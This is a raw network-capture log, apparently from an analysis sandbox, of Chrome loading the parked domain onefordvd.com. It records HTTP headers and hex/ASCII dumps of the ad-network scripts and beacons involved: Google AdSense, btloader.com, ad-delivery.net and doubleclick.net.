                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 30 39 35 30 32 37 32 31 30 37 31 35 31 33 36 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 64 6f 67 6c 69 6e 6b 73 2e 63 6f 6d 22 3a 7b 22 63 65 22 3a 66 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 32 30 34 38 36 31 31 33 34 33 30 37 33 32 38 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 66 6f 6f 74 62 61 6c 6c 74 69 63 6b 65 74 2e 6e 65 74 22 3a 7b 22 63 65 22 3a 66 61 6c 73 65 2c 22 6d 65 22 3a 66 61 6c 73 65 2c 22 77 22 3a 22 35 31 38 38 36 39 33 36 32 37 35 30 32 35 39 32 22 2c 22 77 69 64 67 65 74 22 3a 66 61 6c 73 65 2c 22 61 22 3a 66 61 6c 73 65 7d 2c 22 6e 79 65 64 61 2e 63 6f 6d 22
                                                                          Data Ascii: lse,"me":false,"w":"5095027210715136","widget":false,"a":false},"doglinks.com":{"ce":false,"me":false,"w":"5204861134307328","widget":false,"a":false},"footballticket.net":{"ce":false,"me":false,"w":"5188693627502592","widget":false,"a":false},"nyeda.com"
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 69 64 22 2c 44 29 29 3b 76 61 72 20 54 3d 7b 74 72 61 63 65 49 44 3a 52 2c 73 65 73 73 69 6f 6e 49 44 3a 44 7d 3b 76 61 72 20 56 2c 50 2c 6b 2c 78 2c 4e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 73 2c 72 2c 69 2c 6f 2c 61 2c 63 2c 6c 2c 64 3b 72 65 74 75 72 6e 20 74 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 2c 70 2c 67 2c 76 2c 6d 2c 66 2c 77 2c 43 2c 4c 2c 52 2c 44 2c 56 2c 50 2c 6b 2c 78 3b 72 65 74 75 72 6e 20 6e 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 73 77 69 74 63 68 28 6e 2e 6c 61 62 65 6c 29 7b 63 61 73 65 20 30 3a 69 66 28 74 3d 7b 77 65 62 73 69 74 65 49 44 3a 76 6f 69 64 20 30 2c 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3a 21 31 2c 6d 6f 62 69 6c
                                                                          Data Ascii: id",D));var T={traceID:R,sessionID:D};var V,P,k,x,N=function(){var e,s,r,i,o,a,c,l,d;return t(this,void 0,void 0,(function(){var t,p,g,v,m,f,w,C,L,R,D,V,P,k,x;return n(this,(function(n){switch(n.label){case 0:if(t={websiteID:void 0,contentEnabled:!1,mobil
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 3d 77 2e 74 61 67 44 61 74 61 2e 77 69 64 67 65 74 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 26 26 65 2c 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 2c 62 75 6e 64 6c 65 44 61 74 61 3a 77 2e 62 75 6e 64 6c 65 44 61 74 61 2c 72 6c 53 65 74 74 69 6e 67 73 3a 77 2e 6d 65 73 73 61 67 65 57 61 6c 6c 2c 63 68 65 63 6b 73 75 6d 3a 77 2e 63 68 65 63 6b 73 75 6d 7d 5d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 6e 2e 73 65 6e 74 28 29 2c 5b 33 2c 35 5d 3b 63 61 73 65 20 35 3a 69 66 28 67 26 26 67 20 69 6e 20 41 29 4c 3d 41 5b 67 5d 2c 74 2e 77 65 62 73 69 74 65 49 44 3d 6e 75 6c 6c 21 3d 3d 28 73 3d 4c 2e 77 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 3f 73 3a 4c 2e 77 65 62 73 69 74 65 5f 69 64 2c 74 2e 63 6f 6e 74 65 6e 74 45 6e 61 62 6c 65 64 3d 6e 75 6c 6c 21 3d 3d 28
                                                                          Data Ascii: =w.tagData.widget)&&void 0!==e&&e,[2,{siteInfo:t,bundleData:w.bundleData,rlSettings:w.messageWall,checksum:w.checksum}];case 4:return n.sent(),[3,5];case 5:if(g&&g in A)L=A[g],t.websiteID=null!==(s=L.w)&&void 0!==s?s:L.website_id,t.contentEnabled=null!==(
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 6f 6e 28 29 7b 6e 28 72 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 2c 72 2e 73 65 6e 64 28 74 29 7d 29 29 7d 28 22 68 74 74 70 73 3a 2f 2f 22 2b 53 2b 22 2f 65 76 65 6e 74 73 2f 75 6e 6b 6e 6f 77 6e 5f 64 6f 6d 61 69 6e 73 3f 75 70 61 70 69 3d 74 72 75 65 26 74 69 64 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 54 2e 74 72 61 63 65 49 44 29 2b 22 26 63 76 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 49 29 2c 56 29 7d 72 65 74 75 72 6e 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 7d 5d 7d 7d 29 29 7d 29 29 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 4e 7d 4e 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44 3a
                                                                          Data Ascii: on(){n(r.responseText)},r.send(t)}))}("https://"+S+"/events/unknown_domains?upapi=true&tid="+encodeURIComponent(T.traceID)+"&cv="+encodeURIComponent(I),V)}return[2,{siteInfo:t}]}}))}))}();function U(){return N}N.then((function(e){window.__bt_tag_d={orgID:
                                                                          2024-08-29 15:12:16 UTC1369INData Raw: 22 2c 36 31 5d 2c 5b 22 2d 22 2c 36 32 5d 2c 5b 22 5f 22 2c 36 33 5d 5d 29 3b 73 74 61 74 69 63 20 42 41 53 49 53 3d 36 3b 73 74 61 74 69 63 20 4c 43 4d 3d 32 34 3b 73 74 61 74 69 63 20 65 6e 63 6f 64 65 28 65 29 7b 69 66 28 21 2f 5e 5b 30 2d 31 5d 2b 24 2f 2e 74 65 73 74 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 4d 28 22 49 6e 76 61 6c 69 64 20 62 69 74 46 69 65 6c 64 22 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 6c 65 6e 67 74 68 25 74 68 69 73 2e 4c 43 4d 3b 65 2b 3d 74 3f 22 30 22 2e 72 65 70 65 61 74 28 74 68 69 73 2e 4c 43 4d 2d 74 29 3a 22 22 3b 6c 65 74 20 6e 3d 22 22 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 3d 74 68 69 73 2e 42 41 53 49 53 29 6e 2b 3d 74 68 69 73 2e 44 49 43 54 5b 70 61 72 73 65 49 6e 74 28 65 2e 73
                                                                          Data Ascii: ",61],["-",62],["_",63]]);static BASIS=6;static LCM=24;static encode(e){if(!/^[0-1]+$/.test(e))throw new M("Invalid bitField");const t=e.length%this.LCM;e+=t?"0".repeat(this.LCM-t):"";let n="";for(let t=0;t<e.length;t+=this.BASIS)n+=this.DICT[parseInt(e.s


Session ID: 2
Source IP: 192.168.2.5
Source Port: 53743
Destination IP: 142.250.186.68
Destination Port: 443
PID: 4040
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp: 2024-08-29 15:12:16 UTC, Bytes transferred: 651, Direction: OUT
GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1
Host: www.google.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://www.onefordvd.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Timestamp: 2024-08-29 15:12:16 UTC, Bytes transferred: 844, Direction: IN
HTTP/1.1 200 OK
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/javascript; charset=UTF-8
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
Content-Length: 153696
Date: Thu, 29 Aug 2024 15:12:16 GMT
Expires: Thu, 29 Aug 2024 15:12:16 GMT
Cache-Control: private, max-age=3600
ETag: "9010774428184917835"
X-Content-Type-Options: nosniff
Link: <https://syndicatedsearch.goog>; rel="preconnect"
Server: sffe
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
                                                                          Data Ascii: =l.next,{done:!1,value:k(l)};l=null}return{done:!0,value:void 0}})}function d(h,k){var l=k&&typeof k;l=="object"||l=="function"?f.has(k)?l=f.get(k):(l=""+ ++g,f.set(k,l)):l="p_"+k;var n=h[0][l];if(n&&ra(h[0],l))for(h=0;h<n.length;h++){var p=n[h];if(k!==k&
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 58 3d 62 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 68 29 2e 49 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 28 68 3d 64 28 74 68 69 73 2c 68 29 2e 49 29 26 26 68 2e 76 61 6c 75 65 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 68 29 7b 72 65 74 75 72 6e 5b 68 2e 6b 65 79 2c 68 2e 76 61 6c 75 65 5d 7d 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79
                                                                          Data Ascii: (){this[0]={};this[1]=this[1].X=b();this.size=0};e.prototype.has=function(h){return!!d(this,h).I};e.prototype.get=function(h){return(h=d(this,h).I)&&h.value};e.prototype.entries=function(){return c(this,function(h){return[h.key,h.value]})};e.prototype.key
                                                                          2024-08-29 15:12:16 UTC1390INData Raw: 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 61 3a 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 66 6f 72 28 76 61 72 20 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 30 3b 66 3c 65 3b 66 2b 2b 29 7b 76 61 72 20 67 3d 64 5b 66 5d 3b 69 66 28 62 2e 63 61 6c 6c 28 63 2c 67 2c 66 2c 64 29 29 7b 62 3d 67 3b 62 72 65 61 6b 20 61 7d 7d 62 3d 76 6f 69 64 20 30 7d 72 65 74 75 72 6e 20 62 7d 7d 29 3b 71 28 22 4f 62 6a 65 63 74 2e 76 61 6c 75 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3d 5b 5d 2c 64 3b 66 6f 72 28 64 20 69 6e 20 62 29 72 61 28 62 2c 64 29 26 26 63 2e 70
                                                                          Data Ascii: urn a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}});q("Object.values",function(a){return a?a:function(b){var c=[],d;for(d in b)ra(b,d)&&c.p


                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                          3          | 192.168.2.5 | 53749       | 172.67.69.194  | 443              | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

                                                                          Timestamp               | Bytes transferred | Direction | Data
                                                                          2024-08-29 15:12:17 UTC | 587               | OUT       | GET /px.gif?ch=2 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC | 1224              | IN        | HTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:18 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 858109
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MUjUAt3V%2FuP7MoyDbnjhPj0Xnu0BmVGvBdK2u04%2BIpRb9zqAxA7u9z0kPNX82yfmfGk29QGcMHf9vhGg8xzz2b2%2BebAZIkeXolr2j1JAa8Voq%2BvLYbwWpjdoSPzzobWidw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a80c90d4326-EWR
                                                                          2024-08-29 15:12:18 UTC | 43                | IN        | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                          4          | 192.168.2.5 | 53750       | 172.67.69.194  | 443              | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

                                                                          Timestamp               | Bytes transferred | Direction | Data
                                                                          2024-08-29 15:12:17 UTC | 608               | OUT       | GET /px.gif?ch=1&e=0.7379176731179411 HTTP/1.1
                                                                          Host: ad-delivery.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC | 1222              | IN        | HTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: image/gif
                                                                          Content-Length: 43
                                                                          Connection: close
                                                                          X-GUploader-UploadID: ABPtcPpGQj4M5XWsw0_afNd_e9OGg14LZRJ1uEm-mT1UqcHm2kBDuQd0t4vHO2_h4el5IlQxZBc
                                                                          x-goog-generation: 1620242732037093
                                                                          x-goog-metageneration: 5
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 43
                                                                          x-goog-hash: crc32c=cpEfJQ==
                                                                          x-goog-hash: md5=rUsPYG4PhGW8TEwXCzfhow==
                                                                          x-goog-storage-class: MULTI_REGIONAL
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Expose-Headers: *, Content-Length, Date, Server, Transfer-Encoding, X-GUploader-UploadID, X-Google-Trace
                                                                          Expires: Fri, 30 Aug 2024 15:12:18 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 861940
                                                                          Last-Modified: Wed, 05 May 2021 19:25:32 GMT
                                                                          ETag: "ad4b0f606e0f8465bc4c4c170b37e1a3"
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IijKi690RbRz0dH5uZ8ivS0Yjt6WoJqVRM73Hwwto3PV60skcfEK7xSn4ruyxGrAeEqTKEmMFOCoWRbTU6XU%2FgcpK%2Fx7UOldWEBAAh8Cosodd%2BncSIuASCbTxYW0xWdxAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a80b8d6425c-EWR
                                                                          2024-08-29 15:12:18 UTC | 43                | IN        | Data Raw: 47 49 46 38 39 61 01 00 01 00 80 01 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 02 4c 01 00 3b
                                                                          Data Ascii: GIF89a!,L;


                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                          5          | 192.168.2.5 | 53751       | 216.58.206.38  | 443              | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

                                                                          Timestamp               | Bytes transferred | Direction | Data
                                                                          2024-08-29 15:12:18 UTC | 738               | OUT       | GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1
                                                                          Host: ad.doubleclick.net
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC | 745               | IN        | HTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Access-Control-Allow-Origin: *
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="ads-doubleclick-media"
                                                                          Report-To: {"group":"ads-doubleclick-media","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-doubleclick-media"}]}
                                                                          Content-Length: 1078
                                                                          X-Content-Type-Options: nosniff
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Date: Thu, 29 Aug 2024 13:11:41 GMT
                                                                          Expires: Fri, 30 Aug 2024 13:11:41 GMT
                                                                          Cache-Control: public, max-age=86400
                                                                          Age: 7237
                                                                          Last-Modified: Tue, 08 May 2012 13:08:06 GMT
                                                                          Content-Type: image/x-icon
                                                                          Vary: Accept-Encoding
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                          6          | 192.168.2.5 | 53752       | 172.67.41.60   | 443              | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe

                                                                          Timestamp               | Bytes transferred | Direction | Data
                                                                          2024-08-29 15:12:18 UTC | 369               | OUT       | GET /tag?o=5097926782615552&upapi=true HTTP/1.1
                                                                          Host: btloader.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:18 UTC | 445               | IN        | HTTP/1.1 200 OK
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Content-Type: application/javascript
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=300, must-revalidate, stale-if-error=3600, stale-while-revalidate=300
                                                                          Etag: W/"797aa17e982f10a873a7f98bd2d4edb9"
                                                                          Last-Modified: Thu, 29 Aug 2024 15:09:35 GMT
                                                                          Vary: Origin
                                                                          Via: 1.1 google
                                                                          CF-Cache-Status: HIT
                                                                          Age: 10
                                                                          Server: cloudflare
                                                                          CF-RAY: 8bad7a846b370cb4-EWR
                                                                          Data Ascii: e=w.tagData.widget)&&void 0!==e&&e,[2,{siteInfo:t,bundleData:w.bundleData,rlSettings:w.messageWall,checksum:w.checksum}];case 4:return n.sent(),[3,5];case 5:if(g&&g in A)L=A[g],t.websiteID=null!==(s=L.w)&&void 0!==s?s:L.website_id,t.contentEnabled=null!==
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 69 6f 6e 28 29 7b 6e 28 72 2e 72 65 73 70 6f 6e 73 65 54 65 78 74 29 7d 2c 72 2e 73 65 6e 64 28 74 29 7d 29 29 7d 28 22 68 74 74 70 73 3a 2f 2f 22 2b 53 2b 22 2f 65 76 65 6e 74 73 2f 75 6e 6b 6e 6f 77 6e 5f 64 6f 6d 61 69 6e 73 3f 75 70 61 70 69 3d 74 72 75 65 26 74 69 64 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 54 2e 74 72 61 63 65 49 44 29 2b 22 26 63 76 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 49 29 2c 56 29 7d 72 65 74 75 72 6e 5b 32 2c 7b 73 69 74 65 49 6e 66 6f 3a 74 7d 5d 7d 7d 29 29 7d 29 29 7d 28 29 3b 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 4e 7d 4e 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2e 5f 5f 62 74 5f 74 61 67 5f 64 3d 7b 6f 72 67 49 44
                                                                          Data Ascii: ion(){n(r.responseText)},r.send(t)}))}("https://"+S+"/events/unknown_domains?upapi=true&tid="+encodeURIComponent(T.traceID)+"&cv="+encodeURIComponent(I),V)}return[2,{siteInfo:t}]}}))}))}();function U(){return N}N.then((function(e){window.__bt_tag_d={orgID
                                                                          2024-08-29 15:12:18 UTC1369INData Raw: 39 22 2c 36 31 5d 2c 5b 22 2d 22 2c 36 32 5d 2c 5b 22 5f 22 2c 36 33 5d 5d 29 3b 73 74 61 74 69 63 20 42 41 53 49 53 3d 36 3b 73 74 61 74 69 63 20 4c 43 4d 3d 32 34 3b 73 74 61 74 69 63 20 65 6e 63 6f 64 65 28 65 29 7b 69 66 28 21 2f 5e 5b 30 2d 31 5d 2b 24 2f 2e 74 65 73 74 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 4d 28 22 49 6e 76 61 6c 69 64 20 62 69 74 46 69 65 6c 64 22 29 3b 63 6f 6e 73 74 20 74 3d 65 2e 6c 65 6e 67 74 68 25 74 68 69 73 2e 4c 43 4d 3b 65 2b 3d 74 3f 22 30 22 2e 72 65 70 65 61 74 28 74 68 69 73 2e 4c 43 4d 2d 74 29 3a 22 22 3b 6c 65 74 20 6e 3d 22 22 3b 66 6f 72 28 6c 65 74 20 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 3d 74 68 69 73 2e 42 41 53 49 53 29 6e 2b 3d 74 68 69 73 2e 44 49 43 54 5b 70 61 72 73 65 49 6e 74 28 65 2e
                                                                          Data Ascii: 9",61],["-",62],["_",63]]);static BASIS=6;static LCM=24;static encode(e){if(!/^[0-1]+$/.test(e))throw new M("Invalid bitField");const t=e.length%this.LCM;e+=t?"0".repeat(this.LCM-t):"";let n="";for(let t=0;t<e.length;t+=this.BASIS)n+=this.DICT[parseInt(e.


                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                           7 | 192.168.2.5 | 53753 | 142.250.186.68 | 443 | 4040 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                           2024-08-29 15:12:18 UTC | 474 | OUT | GET /adsense/domains/caf.js?abp=1&gdabp=true HTTP/1.1
                                                                          Host: www.google.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                           2024-08-29 15:12:18 UTC | 845 | IN | HTTP/1.1 200 OK
                                                                          Accept-Ranges: bytes
                                                                          Vary: Accept-Encoding
                                                                          Content-Type: text/javascript; charset=UTF-8
                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/ads-afs-ui
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="ads-afs-ui"
                                                                          Report-To: {"group":"ads-afs-ui","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/ads-afs-ui"}]}
                                                                          Content-Length: 153696
                                                                          Date: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Expires: Thu, 29 Aug 2024 15:12:18 GMT
                                                                          Cache-Control: private, max-age=3600
                                                                          ETag: "13124766774017435736"
                                                                          X-Content-Type-Options: nosniff
                                                                          Link: <https://syndicatedsearch.goog>; rel="preconnect"
                                                                          Server: sffe
                                                                          X-XSS-Protection: 0
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close
